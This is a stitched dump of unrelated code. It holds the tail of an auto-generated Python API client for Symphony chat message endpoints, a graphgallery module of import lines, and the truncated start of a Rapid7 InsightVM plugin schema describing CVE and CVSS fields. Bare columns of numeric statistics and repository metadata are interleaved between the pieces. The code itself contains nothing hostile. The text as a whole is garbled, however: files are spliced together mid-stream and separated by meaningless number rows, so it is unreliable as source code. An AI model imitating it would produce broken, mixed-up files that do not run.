self.v1_message_search_post = _Endpoint(
settings={
'response_type': (V4MessageList,),
'auth': [],
'endpoint_path': '/v1/message/search',
'operation_id': 'v1_message_search_post',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'session_token',
'key_manager_token',
'query',
'skip',
'limit',
'scope',
'sort_dir',
],
'required': [
'session_token',
'key_manager_token',
'query',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'session_token':
(str,),
'key_manager_token':
(str,),
'query':
(MessageSearchQuery,),
'skip':
(int,),
'limit':
(int,),
'scope':
(str,),
'sort_dir':
(str,),
},
'attribute_map': {
'session_token': 'sessionToken',
'key_manager_token': 'keyManagerToken',
'skip': 'skip',
'limit': 'limit',
'scope': 'scope',
'sort_dir': 'sortDir',
},
'location_map': {
'session_token': 'header',
'key_manager_token': 'header',
'query': 'body',
'skip': 'query',
'limit': 'query',
'scope': 'query',
'sort_dir': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__v1_message_search_post
)
def __v4_message_blast_post(
self,
session_token,
sids,
**kwargs
):
"""Post a message to multiple existing streams. # noqa: E501
Post a new message to the given list of streams. The stream can be a chatroom, an IM or a multiparty IM. You may include an attachment on the message. The message can be provided as MessageMLV2 or PresentationML. Both formats support Freemarker templates. The optional parameter \"data\" can be used to provide a JSON payload containing entity data. If the message contains explicit references to entity data (in \"data-entity-id\" element attributes), this parameter is required. If the message is in MessageML and fails schema validation a client error results This endpoint is idempotent, it means that a 200 response will be returned even if the message has not been delivered to some streams. Check the `errors` map from the response in order to see on which stream(s) the message has not been delivered. The maximum number of streams where the message can be sent is limitted to 100. Regarding authentication, you must either use the sessionToken which was created for delegated app access or both the sessionToken and keyManagerToken together. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = agent_api.v4_message_blast_post(session_token, sids, async_req=True)
>>> result = thread.get()
Args:
session_token (str): Authorization token used to make delegated calls.
sids ([str]): A comma-separated list of Stream IDs
Keyword Args:
key_manager_token (str): Key Manager authentication token.. [optional]
message (str): The message payload in MessageML.. [optional]
data (str): Optional message data in EntityJSON.. [optional]
version (str): Optional message version in the format \\\"major.minor\\\". If empty, defaults to the latest supported version. . [optional]
attachment (file_type): Optional file attachment.. [optional]
preview (file_type): Optional attachment preview.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V4MessageBlastResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['session_token'] = \
session_token
kwargs['sids'] = \
sids
return self.call_with_http_info(**kwargs)
self.v4_message_blast_post = _Endpoint(
settings={
'response_type': (V4MessageBlastResponse,),
'auth': [],
'endpoint_path': '/v4/message/blast',
'operation_id': 'v4_message_blast_post',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'session_token',
'sids',
'key_manager_token',
'message',
'data',
'version',
'attachment',
'preview',
],
'required': [
'session_token',
'sids',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'session_token':
(str,),
'sids':
([str],),
'key_manager_token':
(str,),
'message':
(str,),
'data':
(str,),
'version':
(str,),
'attachment':
(file_type,),
'preview':
(file_type,),
},
'attribute_map': {
'session_token': 'sessionToken',
'sids': 'sids',
'key_manager_token': 'keyManagerToken',
'message': 'message',
'data': 'data',
'version': 'version',
'attachment': 'attachment',
'preview': 'preview',
},
'location_map': {
'session_token': 'header',
'sids': 'form',
'key_manager_token': 'header',
'message': 'form',
'data': 'form',
'version': 'form',
'attachment': 'form',
'preview': 'form',
},
'collection_format_map': {
'sids': 'csv',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'multipart/form-data'
]
},
api_client=api_client,
callable=__v4_message_blast_post
)
def __v4_message_import_post(
self,
session_token,
key_manager_token,
message_list,
**kwargs
):
"""Import messages from other systems into Symphony. # noqa: E501
Sends a message to be imported into the system. Allows you to override the timestamp and author of the message with your desired values. The requesting user must have the Content Management role. The user that the message is intended to have come from must also be present in the conversation. The intended message timestamp must be a valid time from the past. It cannot be a future timestamp. Optionally the original message ID can be specified to identify the imported message for the purpose of repeat imports. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = agent_api.v4_message_import_post(session_token, key_manager_token, message_list, async_req=True)
>>> result = thread.get()
Args:
session_token (str): Session authentication token.
key_manager_token (str): Key Manager authentication token.
message_list (V4MessageImportList):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V4ImportResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['session_token'] = \
session_token
kwargs['key_manager_token'] = \
key_manager_token
kwargs['message_list'] = \
message_list
return self.call_with_http_info(**kwargs)
self.v4_message_import_post = _Endpoint(
settings={
'response_type': (V4ImportResponseList,),
'auth': [],
'endpoint_path': '/v4/message/import',
'operation_id': 'v4_message_import_post',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'session_token',
'key_manager_token',
'message_list',
],
'required': [
'session_token',
'key_manager_token',
'message_list',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'session_token':
(str,),
'key_manager_token':
(str,),
'message_list':
(V4MessageImportList,),
},
'attribute_map': {
'session_token': 'sessionToken',
'key_manager_token': 'keyManagerToken',
},
'location_map': {
'session_token': 'header',
'key_manager_token': 'header',
'message_list': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__v4_message_import_post
)
def __v4_stream_sid_message_create_post(
self,
sid,
session_token,
**kwargs
):
"""Post a message to one existing stream. # noqa: E501
Post a new message to the given stream. The stream can be a chatroom, an IM or a multiparty IM. You may include an attachment on the message. The message can be provided as MessageMLV2 or PresentationML. Both formats support Freemarker templates. The optional parameter \"data\" can be used to provide a JSON payload containing entity data. If the message contains explicit references to entity data (in \"data-entity-id\" element attributes), this parameter is required. If the message is in MessageML and fails schema validation a client error results If the message is sent then 200 is returned. Regarding authentication, you must either use the sessionToken which was created for delegated app access or both the sessionToken and keyManagerToken together. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = agent_api.v4_stream_sid_message_create_post(sid, session_token, async_req=True)
>>> result = thread.get()
Args:
sid (str): Stream ID
session_token (str): Authorization token used to make delegated calls.
Keyword Args:
key_manager_token (str): Key Manager authentication token.. [optional]
message (str): The message payload in MessageML.. [optional]
data (str): Optional message data in EntityJSON.. [optional]
version (str): Optional message version in the format \\\"major.minor\\\". If empty, defaults to the latest supported version. . [optional]
attachment (file_type): Optional file attachment.. [optional]
preview (file_type): Optional attachment preview.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V4Message
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['sid'] = \
sid
kwargs['session_token'] = \
session_token
return self.call_with_http_info(**kwargs)
self.v4_stream_sid_message_create_post = _Endpoint(
settings={
'response_type': (V4Message,),
'auth': [],
'endpoint_path': '/v4/stream/{sid}/message/create',
'operation_id': 'v4_stream_sid_message_create_post',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'sid',
'session_token',
'key_manager_token',
'message',
'data',
'version',
'attachment',
'preview',
],
'required': [
'sid',
'session_token',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'sid':
(str,),
'session_token':
(str,),
'key_manager_token':
(str,),
'message':
(str,),
'data':
(str,),
'version':
(str,),
'attachment':
(file_type,),
'preview':
(file_type,),
},
'attribute_map': {
'sid': 'sid',
'session_token': 'sessionToken',
'key_manager_token': 'keyManagerToken',
'message': 'message',
'data': 'data',
'version': 'version',
'attachment': 'attachment',
'preview': 'preview',
},
'location_map': {
'sid': 'path',
'session_token': 'header',
'key_manager_token': 'header',
'message': 'form',
'data': 'form',
'version': 'form',
'attachment': 'form',
'preview': 'form',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'multipart/form-data'
]
},
api_client=api_client,
callable=__v4_stream_sid_message_create_post
)
def __v4_stream_sid_message_get(
self,
sid,
since,
session_token,
key_manager_token,
**kwargs
):
"""Get messages from an existing stream. # noqa: E501
A caller can fetch all unseen messages by passing the timestamp of the last message seen as the since parameter and the number of messages with the same timestamp value already seen as the skip parameter. This means that every message will be seen exactly once even in the case that an additional message is processed with the same timestamp as the last message returned by the previous call, and the case where there are more than maxMessages with the same timestamp value. This method is intended for historic queries and is generally reliable but if guaranteed delivery of every message in real time is required then the equivilent firehose method should be called. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = agent_api.v4_stream_sid_message_get(sid, since, session_token, key_manager_token, async_req=True)
>>> result = thread.get()
Args:
sid (str): Stream ID
since (int): Timestamp of first required message. This is a long integer value representing milliseconds since Jan 1 1970
session_token (str): Session authentication token.
key_manager_token (str): Key Manager authentication token.
Keyword Args:
skip (int): No. of messages to skip. . [optional]
limit (int): Max No. of messages to return. If no value is provided, 50 is the default. The maximum supported value is 500. . [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V4MessageList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['sid'] = \
sid
kwargs['since'] = \
since
kwargs['session_token'] = \
session_token
kwargs['key_manager_token'] = \
key_manager_token
return self.call_with_http_info(**kwargs)
self.v4_stream_sid_message_get = _Endpoint(
settings={
'response_type': (V4MessageList,),
'auth': [],
'endpoint_path': '/v4/stream/{sid}/message',
'operation_id': 'v4_stream_sid_message_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'sid',
'since',
'session_token',
'key_manager_token',
'skip',
'limit',
],
'required': [
'sid',
'since',
'session_token',
'key_manager_token',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'sid':
(str,),
'since':
(int,),
'session_token':
(str,),
'key_manager_token':
(str,),
'skip':
(int,),
'limit':
(int,),
},
'attribute_map': {
'sid': 'sid',
'since': 'since',
'session_token': 'sessionToken',
'key_manager_token': 'keyManagerToken',
'skip': 'skip',
'limit': 'limit',
},
'location_map': {
'sid': 'path',
'since': 'query',
'session_token': 'header',
'key_manager_token': 'header',
'skip': 'query',
'limit': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__v4_stream_sid_message_get
)
def __v4_stream_sid_message_mid_update_post(
self,
sid,
mid,
session_token,
**kwargs
):
"""Update an existing message. # noqa: E501
Update an existing message. The existing message must be a valid social message, that has not been deleted. The message can be provided as MessageMLV2 or PresentationML. Both formats support Freemarker templates. The optional parameter \"data\" can be used to provide a JSON payload containing entity data. If the message contains explicit references to entity data (in \"data-entity-id\" element attributes), this parameter is required. If the message is in MessageML and fails schema validation a client error results If the message is updated then 200 is returned. Regarding authentication, you must either use the sessionToken which was created for delegated app access or both the sessionToken and keyManagerToken together. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = agent_api.v4_stream_sid_message_mid_update_post(sid, mid, session_token, async_req=True)
>>> result = thread.get()
Args:
sid (str): Stream ID
mid (str): Parent message ID
session_token (str): Authorization token used to make delegated calls.
Keyword Args:
key_manager_token (str): Key Manager authentication token.. [optional]
message (str): The message payload in MessageML.. [optional]
data (str): Optional message data in EntityJSON.. [optional]
version (str): Optional message version in the format \\\"major.minor\\\". If empty, defaults to the latest supported version. . [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V4Message
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['sid'] = \
sid
kwargs['mid'] = \
mid
kwargs['session_token'] = \
session_token
return self.call_with_http_info(**kwargs)
self.v4_stream_sid_message_mid_update_post = _Endpoint(
settings={
'response_type': (V4Message,),
'auth': [],
'endpoint_path': '/v4/stream/{sid}/message/{mid}/update',
'operation_id': 'v4_stream_sid_message_mid_update_post',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'sid',
'mid',
'session_token',
'key_manager_token',
'message',
'data',
'version',
],
'required': [
'sid',
'mid',
'session_token',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'sid':
(str,),
'mid':
(str,),
'session_token':
(str,),
'key_manager_token':
(str,),
'message':
(str,),
'data':
(str,),
'version':
(str,),
},
'attribute_map': {
'sid': 'sid',
'mid': 'mid',
'session_token': 'sessionToken',
'key_manager_token': 'keyManagerToken',
'message': 'message',
'data': 'data',
'version': 'version',
},
'location_map': {
'sid': 'path',
'mid': 'path',
'session_token': 'header',
'key_manager_token': 'header',
'message': 'form',
'data': 'form',
'version': 'form',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'multipart/form-data'
]
},
api_client=api_client,
callable=__v4_stream_sid_message_mid_update_post
)
| 42.365533
| 1,241
| 0.484413
| 4,993
| 54,821
| 5.107751
| 0.094532
| 0.037643
| 0.038231
| 0.025095
| 0.822452
| 0.809238
| 0.78677
| 0.76889
| 0.759048
| 0.730581
| 0
| 0.005988
| 0.433392
| 54,821
| 1,293
| 1,242
| 42.398299
| 0.815047
| 0.381113
| 0
| 0.729759
| 0
| 0
| 0.222222
| 0.026255
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009847
| false
| 0
| 0.019694
| 0
| 0.039387
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
db52f9ac51efe466327bc4f01d5813812eb53145
| 309
|
py
|
Python
|
graphgallery/transforms/tensor_transform/__init__.py
|
Sharpiless/GraphGallery
|
5e8895cc2ca2fc06a31bfc58bc3b7a52e1ceddd0
|
[
"MIT"
] | 1
|
2020-11-22T10:14:58.000Z
|
2020-11-22T10:14:58.000Z
|
graphgallery/transforms/tensor_transform/__init__.py
|
Sharpiless/GraphGallery
|
5e8895cc2ca2fc06a31bfc58bc3b7a52e1ceddd0
|
[
"MIT"
] | null | null | null |
graphgallery/transforms/tensor_transform/__init__.py
|
Sharpiless/GraphGallery
|
5e8895cc2ca2fc06a31bfc58bc3b7a52e1ceddd0
|
[
"MIT"
] | 1
|
2020-11-22T10:14:59.000Z
|
2020-11-22T10:14:59.000Z
|
from graphgallery import backend
from graphgallery.transforms.tensor_transform.tensor2tensor import tensor2tensor
from graphgallery.transforms.tensor_transform.astensor import *
from graphgallery.transforms.tensor_transform import tf_tensor
from graphgallery.transforms.tensor_transform import th_tensor
| 51.5
| 81
| 0.883495
| 35
| 309
| 7.628571
| 0.314286
| 0.299625
| 0.389513
| 0.479401
| 0.659176
| 0.35206
| 0
| 0
| 0
| 0
| 0
| 0.007042
| 0.080906
| 309
| 5
| 82
| 61.8
| 0.933099
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
db6028d5283d25f1592f1125a46c95d06ce4c3bf
| 31,853
|
py
|
Python
|
plugins/rapid7_insightvm/komand_rapid7_insightvm/actions/get_vulnerabilities_by_cve/schema.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 46
|
2019-06-05T20:47:58.000Z
|
2022-03-29T10:18:01.000Z
|
plugins/rapid7_insightvm/komand_rapid7_insightvm/actions/get_vulnerabilities_by_cve/schema.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 386
|
2019-06-07T20:20:39.000Z
|
2022-03-30T17:35:01.000Z
|
plugins/rapid7_insightvm/komand_rapid7_insightvm/actions/get_vulnerabilities_by_cve/schema.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 43
|
2019-07-09T14:13:58.000Z
|
2022-03-28T12:04:46.000Z
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
import komand
import json
class Component:
DESCRIPTION = "Get vulnerability details associated with a CVE"
class Input:
CVE_ID = "cve_id"
class Output:
VULNERABILITIES = "vulnerabilities"
class GetVulnerabilitiesByCveInput(komand.Input):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"cve_id": {
"type": "string",
"title": "CVE ID",
"description": "Common Vulnerabilities and Exposures ID, e.g. CVE-2018-12345",
"order": 1
}
},
"required": [
"cve_id"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
class GetVulnerabilitiesByCveOutput(komand.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"vulnerabilities": {
"type": "array",
"title": "Vulnerabilities",
"description": "Vulnerability details",
"items": {
"$ref": "#/definitions/vulnerability"
},
"order": 1
}
},
"required": [
"vulnerabilities"
],
"definitions": {
"cvss": {
"type": "object",
"title": "cvss",
"properties": {
"links": {
"type": "array",
"title": "Links",
"description": "List of hypermedia links to corresponding resources",
"items": {
"$ref": "#/definitions/link"
},
"order": 1
},
"v2": {
"$ref": "#/definitions/cvss_v2",
"title": "V2",
"description": "CVSSv2 details",
"order": 2
},
"v3": {
"$ref": "#/definitions/cvss_v3",
"title": "V3",
"description": "CVSSv3 details",
"order": 3
}
},
"definitions": {
"cvss_v2": {
"type": "object",
"title": "cvss_v2",
"properties": {
"accessComplexity": {
"type": "string",
"title": "Access Complexity",
"description": "CVSSv2 access complexity metric",
"order": 1
},
"accessVector": {
"type": "string",
"title": "Access Vector",
"description": "CVSSv2 access vector metric",
"order": 2
},
"authentication": {
"type": "string",
"title": "Authentication",
"description": "CVSSv2 authentication metric",
"order": 3
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv2 availability impact metric",
"order": 4
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv2 confidentiality impact metric",
"order": 5
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv2 combined exploit metric score (Access Complexity/Access Vector/Authentication)",
"order": 6
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv2 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 7
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv2 integrity impact metric",
"order": 8
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv2 score",
"order": 9
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv2 combined vector string",
"order": 10
}
}
},
"cvss_v3": {
"type": "object",
"title": "cvss_v3",
"properties": {
"attackComplexity": {
"type": "string",
"title": "Attack Complexity",
"description": "CVSSv3 attack complexity metric",
"order": 1
},
"attackVector": {
"type": "string",
"title": "Attack Vector",
"description": "CVSSv3 attack vector metric",
"order": 2
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv3 availability impact metric",
"order": 3
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv3 confidentiality impact metric",
"order": 4
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv3 combined exploit metric score (Attack Complexity/Attack Vector/Privilege Required/Scope/User Interaction)",
"order": 5
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv3 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 6
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv3 integrity impact metric",
"order": 7
},
"privilegeRequired": {
"type": "string",
"title": "Privilege Required",
"description": "CVSSv3 privilege required metric",
"order": 8
},
"scope": {
"type": "string",
"title": "Scope",
"description": "CVSSv3 scope metric",
"order": 9
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv3 score",
"order": 10
},
"userInteraction": {
"type": "string",
"title": "User Interaction",
"description": "CVSSv3 user interaction metric",
"order": 11
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv3 combined vector string",
"order": 12
}
}
},
"link": {
"type": "object",
"title": "link",
"properties": {
"href": {
"type": "string",
"title": "URL",
"description": "A hypertext reference, which is either a URI (see RFC 3986) or URI template (see RFC 6570)",
"order": 1
},
"rel": {
"type": "string",
"title": "Rel",
"description": "Link relation type following RFC 5988",
"order": 2
}
}
}
}
},
"cvss_v2": {
"type": "object",
"title": "cvss_v2",
"properties": {
"accessComplexity": {
"type": "string",
"title": "Access Complexity",
"description": "CVSSv2 access complexity metric",
"order": 1
},
"accessVector": {
"type": "string",
"title": "Access Vector",
"description": "CVSSv2 access vector metric",
"order": 2
},
"authentication": {
"type": "string",
"title": "Authentication",
"description": "CVSSv2 authentication metric",
"order": 3
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv2 availability impact metric",
"order": 4
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv2 confidentiality impact metric",
"order": 5
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv2 combined exploit metric score (Access Complexity/Access Vector/Authentication)",
"order": 6
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv2 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 7
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv2 integrity impact metric",
"order": 8
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv2 score",
"order": 9
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv2 combined vector string",
"order": 10
}
}
},
"cvss_v3": {
"type": "object",
"title": "cvss_v3",
"properties": {
"attackComplexity": {
"type": "string",
"title": "Attack Complexity",
"description": "CVSSv3 attack complexity metric",
"order": 1
},
"attackVector": {
"type": "string",
"title": "Attack Vector",
"description": "CVSSv3 attack vector metric",
"order": 2
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv3 availability impact metric",
"order": 3
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv3 confidentiality impact metric",
"order": 4
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv3 combined exploit metric score (Attack Complexity/Attack Vector/Privilege Required/Scope/User Interaction)",
"order": 5
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv3 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 6
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv3 integrity impact metric",
"order": 7
},
"privilegeRequired": {
"type": "string",
"title": "Privilege Required",
"description": "CVSSv3 privilege required metric",
"order": 8
},
"scope": {
"type": "string",
"title": "Scope",
"description": "CVSSv3 scope metric",
"order": 9
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv3 score",
"order": 10
},
"userInteraction": {
"type": "string",
"title": "User Interaction",
"description": "CVSSv3 user interaction metric",
"order": 11
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv3 combined vector string",
"order": 12
}
}
},
"link": {
"type": "object",
"title": "link",
"properties": {
"href": {
"type": "string",
"title": "URL",
"description": "A hypertext reference, which is either a URI (see RFC 3986) or URI template (see RFC 6570)",
"order": 1
},
"rel": {
"type": "string",
"title": "Rel",
"description": "Link relation type following RFC 5988",
"order": 2
}
}
},
"pci": {
"type": "object",
"title": "pci",
"properties": {
"adjustedCVSSScore": {
"type": "integer",
"title": "Adjusted CVSS score",
"description": "PCI adjusted CVSS score",
"order": 1
},
"adjustedSeverityScore": {
"type": "integer",
"title": "Adjusted severity score",
"description": "PCI adjusted severity score",
"order": 2
},
"fail": {
"type": "boolean",
"title": "Fail",
"description": "Whether this vulnerability results in a PCI assessment failure",
"order": 3
},
"specialNotes": {
"type": "string",
"title": "Special Notes",
"description": "PCI special notes",
"order": 4
},
"status": {
"type": "string",
"title": "Status",
"description": "PCI status",
"order": 5
}
}
},
"vulnerability": {
"type": "object",
"title": "vulnerability",
"properties": {
"added": {
"type": "string",
"title": "Added",
"displayType": "date",
"description": "Date that the vulnerability was added to InsightVM",
"format": "date-time",
"order": 1
},
"categories": {
"type": "array",
"title": "Categories",
"description": "List of vulnerabilities categories with which this vulnerability is affiliated",
"items": {
"type": "string"
},
"order": 16
},
